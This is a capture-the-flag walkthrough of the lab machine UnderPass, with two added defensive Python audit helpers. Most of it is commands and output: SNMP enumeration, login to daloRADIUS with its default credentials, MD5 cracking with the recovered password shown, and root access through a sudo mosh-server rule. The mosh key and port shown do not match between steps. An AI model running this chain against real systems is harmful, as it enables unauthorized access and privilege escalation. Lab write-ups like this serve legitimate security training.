UnderPass

Synopsis

UnderPass is an easy Linux machine created by dakkmaddy. UDP port 161 runs an SNMP service. Enumerating SNMP reveals that the website hosts a daloRADIUS server, and the daloRADIUS GitHub repository shows where the user and operator login pages live. The default daloRADIUS credentials give access to the dashboard as an operator. The user list contains the password hash of the user svcMosh; cracking it allows logging into the system via SSH as svcMosh. The svcMosh user is allowed to run mosh-server as sudo, which is abused to get a shell as root.

OS: Linux
Difficulty: Easy
Points: 20
Release Date: 21-12-2024
Expire Date: 10-May-2025


Enumeration

Nmap

The nmap TCP scan finds SSH and HTTP services running.

nmap -Pn -sC -sV --min-rate=1000 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 06:54 EDT
Nmap scan report for 10.10.11.48
Host is up (0.74s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.05 seconds

Scanning the UDP ports reveals an SNMP service running on port 161.

nmap -Pn -sU --min-rate=5000 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 07:31 EDT
Nmap scan report for 10.10.11.48
Host is up (0.67s latency).
Not shown: 988 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
22/udp    closed ssh
161/udp   open   snmp
1419/udp  closed timbuktu-srv3
1433/udp  closed ms-sql-s
2222/udp  closed msantipiracy
5010/udp  closed telelpathstart
10080/udp closed amanda
17101/udp closed unknown
20117/udp closed unknown
20288/udp closed unknown
49188/udp closed unknown
49199/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 26.50 seconds
nmap -Pn -sU -sC -sV -p 161 10.10.11.48 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 07:32 EDT
Nmap scan report for 10.10.11.48
Host is up (0.60s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 15h30m56s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 15h30m57.39s (5585739 timeticks)
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.51 seconds

SNMP - Port 161

snmpwalk reveals the contact e-mail steve@underpass.htb and the sysName string "UnDerPass.htb is the only daloradius server in the basin!", which points at a daloRADIUS install.

snmpwalk -v 2c -c public 10.10.11.48
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (6896383) 19:09:23.83
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (6899041) 19:09:50.41
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 05 0F 0E 32 0E 00 2B 00 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 1
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 225
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
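As an added example (not from the original write-up), a small parser for the snmpwalk system-group output above that reports the identifiers it discloses; it assumes the numeric-OID form snmpwalk prints when no MIB files are loaded, and the internal-TLD list in HOST_RE is an assumption:

```python
"""Parse snmpwalk output for the MIB-II system group and report what it discloses."""
import re

# MIB-II system-group leaves (RFC 1213) as snmpwalk prints them without MIBs loaded.
SYSTEM_GROUP = {
    "iso.3.6.1.2.1.1.1.0": "sysDescr",
    "iso.3.6.1.2.1.1.4.0": "sysContact",
    "iso.3.6.1.2.1.1.5.0": "sysName",
    "iso.3.6.1.2.1.1.6.0": "sysLocation",
}

LINE_RE = re.compile(r'^(?P<oid>\S+) = (?P<type>[A-Za-z0-9-]+): (?P<value>.*)$')
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
# Hostnames on internal TLDs that commonly leak via sysName/sysContact (assumed list).
HOST_RE = re.compile(r'\b[\w-]+\.(?:htb|local|lan|internal|corp)\b', re.IGNORECASE)

def parse_snmpwalk(text):
    """Return {name: value} for the system-group entries found in snmpwalk output."""
    found = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group("oid") in SYSTEM_GROUP:
            found[SYSTEM_GROUP[m.group("oid")]] = m.group("value").strip('"')
    return found

def disclosed_identifiers(fields):
    """Collect e-mail addresses and hostnames from the free-text system fields."""
    emails, hosts = set(), set()
    for value in fields.values():
        emails.update(EMAIL_RE.findall(value))
        hosts.update(h.lower() for h in HOST_RE.findall(value))
    return sorted(emails), sorted(hosts)

def kernel_release(sysdescr):
    """net-snmp builds sysDescr from uname: 'Linux <host> <release> ...'."""
    parts = sysdescr.split()
    return parts[2] if len(parts) > 2 and parts[0] == "Linux" else None

# Sample input: the system-group lines from the snmpwalk run above.
SAMPLE = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
"""

if __name__ == "__main__":
    fields = parse_snmpwalk(SAMPLE)
    emails, hosts = disclosed_identifiers(fields)
    print("contact e-mails:", emails)
    print("hostnames:", hosts)
    print("kernel:", kernel_release(fields.get("sysDescr", "")))
```

The same four fields are what a read-only community string such as "public" hands to anyone on the network, so they are the first thing to scrub or restrict in snmpd.conf.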

Web - Port 80

The website shows the default Apache2 server page.

Fuzzing - Directories and Pages

feroxbuster -u http://10.10.11.48                                                                                     
                                                                                                                                                       
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.48
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       22l      105w     5952c http://10.10.11.48/icons/ubuntu-logo.png
200      GET      363l      961w    10671c http://10.10.11.48/
[####################] - 10m    30005/30005   0s      found:2       errors:1470   
[####################] - 10m    30000/30000   51/s    http://10.10.11.48/ 

The fuzzing did not turn up much. Since SNMP mentioned a daloRADIUS server, the next step is fuzzing directories and pages under /daloradius.

feroxbuster -u http://10.10.11.48/daloradius
                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.48/daloradius
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      315c http://10.10.11.48/daloradius => http://10.10.11.48/daloradius/
301      GET        9l       28w      323c http://10.10.11.48/daloradius/library => http://10.10.11.48/daloradius/library/
301      GET        9l       28w      319c http://10.10.11.48/daloradius/doc => http://10.10.11.48/daloradius/doc/
301      GET        9l       28w      319c http://10.10.11.48/daloradius/app => http://10.10.11.48/daloradius/app/
301      GET        9l       28w      323c http://10.10.11.48/daloradius/contrib => http://10.10.11.48/daloradius/contrib/
301      GET        9l       28w      326c http://10.10.11.48/daloradius/app/common => http://10.10.11.48/daloradius/app/common/
301      GET        9l       28w      325c http://10.10.11.48/daloradius/app/users => http://10.10.11.48/daloradius/app/users/
301      GET        9l       28w      321c http://10.10.11.48/daloradius/setup => http://10.10.11.48/daloradius/setup/
301      GET        9l       28w      335c http://10.10.11.48/daloradius/app/common/includes => http://10.10.11.48/daloradius/app/common/includes/
301      GET        9l       28w      332c http://10.10.11.48/daloradius/app/users/static => http://10.10.11.48/daloradius/app/users/static/
301      GET        9l       28w      330c http://10.10.11.48/daloradius/app/users/lang => http://10.10.11.48/daloradius/app/users/lang/
301      GET        9l       28w      333c http://10.10.11.48/daloradius/app/users/library => http://10.10.11.48/daloradius/app/users/library/
301      GET        9l       28w      333c http://10.10.11.48/daloradius/app/common/static => http://10.10.11.48/daloradius/app/common/static/
301      GET        9l       28w      336c http://10.10.11.48/daloradius/app/common/templates => http://10.10.11.48/daloradius/app/common/templates/
301      GET        9l       28w      333c http://10.10.11.48/daloradius/app/users/include => http://10.10.11.48/daloradius/app/users/include/
301      GET        9l       28w      331c http://10.10.11.48/daloradius/contrib/scripts => http://10.10.11.48/daloradius/contrib/scripts/
301      GET        9l       28w      344c http://10.10.11.48/daloradius/app/users/library/javascript => http://10.10.11.48/daloradius/app/users/library/javascript/
301      GET        9l       28w      340c http://10.10.11.48/daloradius/app/common/static/images => http://10.10.11.48/daloradius/app/common/static/images/
301      GET        9l       28w      336c http://10.10.11.48/daloradius/app/common/static/js => http://10.10.11.48/daloradius/app/common/static/js/
301      GET        9l       28w      337c http://10.10.11.48/daloradius/app/common/static/css => http://10.10.11.48/daloradius/app/common/static/css/
301      GET        9l       28w      326c http://10.10.11.48/daloradius/contrib/db => http://10.10.11.48/daloradius/contrib/db/
301      GET        9l       28w      340c http://10.10.11.48/daloradius/app/users/include/config => http://10.10.11.48/daloradius/app/users/include/config/
301      GET        9l       28w      340c http://10.10.11.48/daloradius/app/users/include/common => http://10.10.11.48/daloradius/app/users/include/common/
301      GET        9l       28w      333c http://10.10.11.48/daloradius/contrib/heartbeat => http://10.10.11.48/daloradius/contrib/heartbeat/
[####################] - 15m   540094/540094  0s      found:24      errors:298324 
[####################] - 10m    30000/30000   53/s    http://10.10.11.48/daloradius/ 
[####################] - 10m    30000/30000   50/s    http://10.10.11.48/daloradius/app/ 
[####################] - 10m    30000/30000   48/s    http://10.10.11.48/daloradius/library/ 
[####################] - 10m    30000/30000   48/s    http://10.10.11.48/daloradius/doc/ 
[####################] - 9m     30000/30000   57/s    http://10.10.11.48/daloradius/contrib/ 
[####################] - 11m    30000/30000   45/s    http://10.10.11.48/daloradius/app/common/ 
[####################] - 11m    30000/30000   45/s    http://10.10.11.48/daloradius/app/users/ 
[####################] - 10m    30000/30000   49/s    http://10.10.11.48/daloradius/setup/ 
[####################] - 5m     30000/30000   101/s   http://10.10.11.48/daloradius/app/common/templates/                    

daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.

The daloRADIUS GitHub repository shows the login.php page for both users and operators, and requesting login.php returns the daloRADIUS login page.

[Screenshot: daloRADIUS GitHub repository]
[Screenshot: daloRADIUS operator login page]

Foothold

Shell - svcMosh

A web search for daloRADIUS default credentials turns up Administrator:radius, and these credentials are valid for the operator login.

[Screenshot: web search for default credentials]
[Screenshot: logging in as operator]

The daloRADIUS dashboard provides the user list. Only the svcMosh user is present, along with its password hash.

Cracking the hash with hashcat (mode 0, raw MD5).

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

412dd4759978acfcc81deab01b382403:underwaterfriends        
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 412dd4759978acfcc81deab01b382403
Time.Started.....: Fri May 16 01:07:49 2025 (1 sec)
Time.Estimated...: Fri May 16 01:07:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4260.1 kH/s (0.21ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2985984/14344385 (20.82%)
Rejected.........: 0/2985984 (0.00%)
Restore.Point....: 2981888/14344385 (20.79%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: unicornn -> unc112886
Hardware.Mon.#1..: Temp: 47c Util: 25%

Started: Fri May 16 01:07:47 2025
Stopped: Fri May 16 01:07:51 2025

Using the cracked password to log in as svcMosh via SSH.

ssh svcMosh@10.10.11.48
The authenticity of host '10.10.11.48 (10.10.11.48)' can't be established.
ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts.
svcMosh@10.10.11.48's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri May 16 04:50:00 AM UTC 2025

  System load:  0.0               Processes:             226
  Usage of /:   52.2% of 6.56GB   Users logged in:       0
  Memory usage: 10%               IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Jan 11 13:29:47 2025 from 10.10.14.62
svcMosh@underpass:~$ 

The user.txt file contains the user flag 👏


Privilege Escalation

Pillaging - svcMosh [ user ]

The svcMosh user is allowed to run /usr/bin/mosh-server as root via sudo without a password.

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
svcMosh@underpass:~$ 

Shell - root

Mosh is a mobile shell tool used to connect from a client computer to a server over the Internet, similar to SSH but with additional features meant to improve usability for mobile users.

Running mosh-server with sudo prints the UDP port and the session key (the MOSH CONNECT line).

svcMosh@underpass:~$ sudo mosh-server


MOSH CONNECT 60001 xZmrCtUg7/lhYpY82VEQEg

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 2857]
svcMosh@underpass:~$

Connecting to port 60001 with mosh-client fails with a "MOSH_KEY environment variable not found" error, so set the MOSH_KEY environment variable to the key printed by mosh-server and run mosh-client again.

svcMosh@underpass:~$ MOSH_KEY=a7JjCnxWIsnm8/fv2se4ow mosh-client 127.0.0.1 60002
root@underpass:~# ls
root.txt
root@underpass:~# 
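As an added example (not the write-up's own code), an audit and detection helper for the sudo rule and the root mosh-server launch shown above: it flags NOPASSWD rules that let mosh-server run as root, and picks out root mosh-server launches from sudo's syslog lines. The auth.log lines are constructed samples in sudo's default log format, not captured from the box.

```python
"""Flag the sudo misconfiguration from this write-up in `sudo -l` output and
detect its use in sudo's syslog lines."""
import re
from posixpath import basename

# Binaries that, started as root via sudo, hand a root shell to whoever holds
# the printed session key. Only mosh-server is listed, the case on this box.
SESSION_SPAWNERS = {"mosh-server"}

# `sudo -l` rule lines look like "(ALL) NOPASSWD: /usr/bin/mosh-server".
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$')
# sudo's default syslog format:
#   sudo:  user : TTY=pts/0 ; PWD=/home/user ; USER=root ; COMMAND=/usr/bin/x
LOG_RE = re.compile(r'sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$')

def _spawner(cmd):
    """True if the command's binary is a session spawner (ignores arguments)."""
    parts = cmd.split()
    return bool(parts) and basename(parts[0]) in SESSION_SPAWNERS

def risky_nopasswd_rules(sudo_l_output):
    """(runas, command) pairs from `sudo -l` output that let a session spawner
    run as root with no password prompt."""
    risky = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m or "NOPASSWD:" not in m.group("tags"):
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if runas in ("ALL", "root") and _spawner(cmd):
                risky.append((runas, cmd))
    return risky

def root_session_spawns(auth_log_lines):
    """(invoking_user, command) for sudo log lines where a session spawner was
    actually started as root: the event to alert on."""
    hits = []
    for line in auth_log_lines:
        m = LOG_RE.search(line)
        if m and m.group("runas") == "root" and _spawner(m.group("cmd")):
            hits.append((m.group("user"), m.group("cmd").strip()))
    return hits

# Rule text taken from the `sudo -l` output above.
SUDO_L_OUTPUT = """\
User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
"""
# Constructed auth.log excerpt in sudo's default format (not captured from the box).
AUTH_LOG = [
    "May 16 04:55:12 underpass sudo:  svcMosh : TTY=pts/0 ; PWD=/home/svcMosh ; USER=root ; COMMAND=/usr/bin/mosh-server",
    "May 16 04:55:12 underpass sudo: pam_unix(sudo:session): session opened for user root(uid=0) by svcMosh(uid=1001)",
    "May 16 04:57:40 underpass sudo:  svcMosh : TTY=pts/0 ; PWD=/home/svcMosh ; USER=root ; COMMAND=/usr/bin/apt update",
]

if __name__ == "__main__":
    print("risky rules:", risky_nopasswd_rules(SUDO_L_OUTPUT))
    print("root spawns:", root_session_spawns(AUTH_LOG))
```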

The root.txt file contains the root flag 🎉


Proof of Concept

The below video provides the PoC of UnderPass machine.
